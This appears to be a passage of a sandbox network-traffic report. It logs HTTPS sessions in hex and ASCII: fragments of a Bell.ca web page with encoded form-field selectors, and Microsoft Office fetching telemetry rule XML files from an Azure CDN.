                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC1956INData Raw: 25 32 39 25 32 30 25 33 45 25 32 30 64 69 76 25 33 41 6e 74 68 2d 63 68 69 6c 64 25 32 38 32 25 32 39 25 32 30 25 33 45 25 32 30 75 6c 25 32 30 25 33 45 25 32 30 6c 69 25 33 41 6e 74 68 2d 63 68 69 6c 64 25 32 38 34 25 32 39 25 32 30 25 33 45 25 32 30 64 69 76 2e 73 65 63 74 69 6f 6e 43 6f 6e 74 65 6e 74 25 32 36 3b 30 25 32 46 25 32 33 70 72 65 70 61 69 64 2d 72 65 76 69 65 77 2d 65 78 70 69 72 61 74 69 6f 6e 2d 64 61 74 65 25 32 36 3b 30 25 32 46 25 32 33 74 78 74 43 61 72 64 48 6f 6c 64 65 72 73 4e 61 6d 65 25 32 36 3b 30 25 32 46 25 32 33 54 72 61 6e 73 69 74 4e 75 6d 62 65 72 25 32 36 3b 30 25 32 46 25 32 33 62 61 6e 6b 43 6f 64 65 25 32 36 3b 30 25 32 46 25 32 33 74 78 74 54 72 61 6e 73 69 74 43 6f 64 65 25 32 36 3b 30 25 32 46 25 32 33 4d 4f 42 25
                                                                                                                                                                                                                                                                                                                                      Data Ascii: %29%20%3E%20div%3Anth-child%282%29%20%3E%20ul%20%3E%20li%3Anth-child%284%29%20%3E%20div.sectionContent%26;0%2F%23prepaid-review-expiration-date%26;0%2F%23txtCardHoldersName%26;0%2F%23TransitNumber%26;0%2F%23bankCode%26;0%2F%23txtTransitCode%26;0%2F%23MOB%
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC16384INData Raw: 34 30 30 30 0d 0a 25 32 46 25 32 33 52 65 76 69 65 77 50 61 67 65 5f 50 61 79 6d 65 6e 74 45 78 70 69 72 79 44 61 74 65 25 32 36 3b 30 25 32 46 25 32 33 66 72 6d 43 6f 6e 66 69 72 6d 25 32 30 25 33 45 25 32 30 64 69 76 25 32 30 25 33 45 25 32 30 64 69 76 25 33 41 6e 74 68 2d 63 68 69 6c 64 25 32 38 32 25 32 39 25 32 30 25 33 45 25 32 30 64 69 76 25 33 41 6e 74 68 2d 63 68 69 6c 64 25 32 38 32 25 32 39 25 32 30 25 33 45 25 32 30 75 6c 25 32 30 25 33 45 25 32 30 6c 69 25 33 41 6e 74 68 2d 63 68 69 6c 64 25 32 38 35 25 32 39 25 32 30 25 33 45 25 32 30 64 69 76 2e 73 65 63 74 69 6f 6e 43 6f 6e 74 65 6e 74 25 32 36 3b 30 25 32 46 25 32 33 42 61 6e 6b 4e 61 6d 65 25 32 36 3b 30 25 32 46 25 32 33 74 78 74 42 61 6e 6b 41 63 63 74 4e 75 6d 62 65 72 25 32 36 3b 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4000%2F%23ReviewPage_PaymentExpiryDate%26;0%2F%23frmConfirm%20%3E%20div%20%3E%20div%3Anth-child%282%29%20%3E%20div%3Anth-child%282%29%20%3E%20ul%20%3E%20li%3Anth-child%285%29%20%3E%20div.sectionContent%26;0%2F%23BankName%26;0%2F%23txtBankAcctNumber%26;0
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC8INData Raw: 62 75 73 69 6e 65 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: busine
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC16384INData Raw: 34 30 30 30 0d 0a 73 73 2e 62 65 6c 6c 2e 63 61 2f 73 68 6f 70 2f 6d 65 64 69 75 6d 2d 6c 61 72 67 65 23 45 58 54 3d 42 65 6c 6c 52 65 66 5f 43 6f 6e 73 75 6d 65 72 5f 46 65 64 4e 61 76 5f 45 4e 54 5f 30 31 31 39 32 30 31 38 5f 54 46 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 62 6c 6f 63 6b 20 64 2d 6d 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 62 68 70 2d 62 75 73 69 6e 65 73 73 2d 63 6f 6e 6e 65 63 74 6f 72 2d 73 70 61 6e 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 22 3e 45 6e 74 65 72 70 72 69 73 65 3c 2f 73 70 61 6e 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4000ss.bell.ca/shop/medium-large#EXT=BellRef_Consumer_FedNav_ENT_01192018_TF tabindex="-1"> <span class="d-block d-md-inline-block bhp-business-connector-span" style="font-weight: 700; ">Enterprise</span>
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC8INData Raw: 6c 69 3e 0d 0a 0d 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: li>
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC16384INData Raw: 34 30 30 30 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 67 2d 6c 61 6e 67 2d 73 65 6c 65 63 74 6f 72 2d 64 65 73 6b 74 6f 70 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 6c 61 74 65 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 43 6f 6e 73 75 6c 74 65 72 20 6c 65 20 73 69 74 65 20 65 6e 20 66 72 61 6e 26 23 32 33 31 3b 61 69 73 22 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4000 <li> <a href="javascript:void(0)" class="g-lang-selector-desktop" translate="no" aria-label="Consulter le site en fran&#231;ais"
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC8INData Raw: 20 20 3c 61 20 68 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <a h
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC16384INData Raw: 34 30 30 30 0d 0a 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 6c 2e 63 61 2f 46 69 62 65 2d 54 56 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 6e 65 63 74 6f 72 2d 6e 61 76 2d 73 68 6f 70 2d 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 6e 65 63 74 6f 72 2d 6e 61 76 2d 73 68 6f 70 2d 6c 69 6e 6b 2d 66 6f 63 75 73 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4000ref="http://www.bell.ca/Fibe-TV" class="g-connector-nav-shop-link"> <span class="g-connector-nav-shop-link-focus"></span>
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC8INData Raw: 20 20 20 20 20 20 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      18192.168.2.94973013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131153Z-16849878b78qwx7pmw9x5fub1c00000007p000000000f7g9
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      19192.168.2.94973113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: abf73cf0-e01e-0052-5534-2ad9df000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131153Z-15b8d89586fxdh48ft0acdbg4400000003bg000000009sqb
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      20192.168.2.94973313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131153Z-16849878b786lft2mu9uftf3y40000000aqg00000000mw88
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      21192.168.2.94973213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 31d36350-c01e-000b-4438-2be255000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131153Z-15b8d89586fmc8ck21zz2rtg1w00000006rg00000000c2r6
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      22192.168.2.94973913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: de33ccc9-c01e-008e-25fe-267381000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131154Z-16849878b78smng4k6nq15r6s40000000b0g00000000f92r
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      23192.168.2.94973613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: bf2855ec-b01e-0084-57b7-2ad736000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131154Z-16849878b78fssff8btnns3b1400000009x00000000079dt
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      24192.168.2.94973713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
